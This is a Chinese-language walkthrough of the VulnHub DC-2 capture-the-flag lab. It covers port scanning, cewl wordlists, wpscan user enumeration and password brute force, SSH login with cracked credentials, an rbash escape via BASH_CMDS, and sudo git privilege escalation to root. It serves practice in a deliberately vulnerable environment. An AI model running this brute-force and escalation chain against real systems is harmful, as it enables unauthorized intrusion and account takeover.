寫寫自己打DC-2的過程
使用工具?kali
DC-2的靶機下載地址為:https://www.vulnhub.com/entry/dc-2,311/
環境配置。
Kali和DC-2都設置為NAT模式,都為僅主機模式也可以。
信息收集
arp-scan -l
nmap -sn 192.168.236.0/24
獲取靶機ip:192.168.236.140
掃描靶機端口:
nmap -sS -T5 --min-rate 10000 192.168.236.140 -sC -p-
開放了80和7744端口
FLAG1
嘗試訪問一下DC-2:192.168.236.140
本地訪問不了會自動跳到DC-2。應該是給重定向了!
我們本地dns綁定下
可以訪問本地hosts
C:\Windows\System32\drivers\etc
修改hosts文件
修改不了的話,右鍵屬性 取消只讀 保存就可以了
添加這樣子的一條
重新訪問就進去了,發現下面有個flag,得到第一個flag
點進去提示我們要使用cewl工具
Cewl是一款采用Ruby開發的應用程序,你可以給它的爬蟲指定URL地址和爬取深度,還可以添額外的外部鏈接,接下來Cewl會給你返回一個字典文件,你可以把字典用到類似John the Ripper這樣的密碼破解工具中。除此之外,Cewl還提供了命令行工具。
FLAG2
看看網站字典,保存下來
cewl http://dc-2 -w passwd.txt
注意:本來用 cewl http://192.168.28.179 -w passwd.txt 的但是沒有任何輸出,想想應該是ip給重定向了,用域名就可以了。
cat passwd.txt 查看下字典
有了密碼字典 還需要找用戶名
用dirb來掃目錄
發現經典的wordpress登錄框,admin.php非常有可能。我們去訪問
網站我們拿到了 還需要賬號
這一看就是Wordpress。
Wordpress有一個著名的掃描工具wpscan
缺用戶名那么我們就
wpscan --url http://dc-2/ -e u?//枚舉用戶名字
枚舉出來的3個賬號
admin
jerry
tom
將這三個用戶名存儲在一個文本文件中
使用wpscan爆破賬號密碼
wpscan --url http://dc-2/ -U user.txt -P passwd.txt
爆破出來了兩組用戶名和密碼
jerry /adipiscing
tom /?parturient
登錄wordpress主頁
登錄成功!
注意:上面url有時候不會跳到http://dc-2/wp-admin/ 導致登錄后空白,可以登錄后輸入url 就可以進去了。
仔細找找多點點FLAG就出來了
提示說:wordpress找不到其他的東西了
FLAG3
想起來了前面有個ssh改端口的改成了7744
然后也了個WordPress的賬號密碼,可以嘗試登錄下
ssh jerry@192.168.236.140 -p 7744?
ssh tom@192.168.236.140 -p 7744
嘗試三次發現jerry無法登錄
嘗試tom用戶,成功登錄
ls查看當前目錄的文件
發現了flag3.txt
cat flag3.txt
發現命令無法使用
compgen -c ? ? ? //查看可以使用的指令
發現vi可以使用
vi flag3.txt
發現flag3.txt
FLAG4
提示說:
Poor old Tom is always running after Jerry. Perhaps he should?su?for all the stress he causes.
可憐的老湯姆老是追杰瑞。也許他應該為他造成的所有壓力負責。
發現tom只能使用less、ls、scp、vi命令,無法直接使用su命令切換用戶
BASH_CMDS[a]=/bin/sh ; a ?#調用/bin/sh命令解釋器
/bin/bash ? #使用bash命令解釋器
export PATH=PATH:/bin:/sbin:/usr/bin:/usr/sbin ?#設置環境變量
此時命令基本上都可以使用,也可以table補全命令
切換到jerry用戶,進入jerry家目錄下
su jerry ?
adipiscing ? #jerry用戶登錄密碼
ls 找到flag4.txt,提示使用git 命令
Flag4:
Good to see that you've made it this far - but you're not home yet.
You still need to get the final flag (the only flag that really counts!!!).?
No hints here - you're on your own now. ?:-)
Go on - git outta here!!!!
sudo -l ? ?#查看可以使用root權限無密碼的命令,有git命令
sudo git -p –-help ?#提權
passwd ?root ? #修改root密碼
123456 ? ?#密碼修改為:123456
su root ? #切換到root用戶
cd /root ?#進入到root家目錄下
ls ? ?#找到final-flag.txt
參考文章:Vulnhub靶機實戰——DC-2_dc-2靶機-CSDN博客
靶機練習:DC-2靶機復現_dc-2靶場打完重置-CSDN博客
當然還有很多方法,我這只是最簡單的。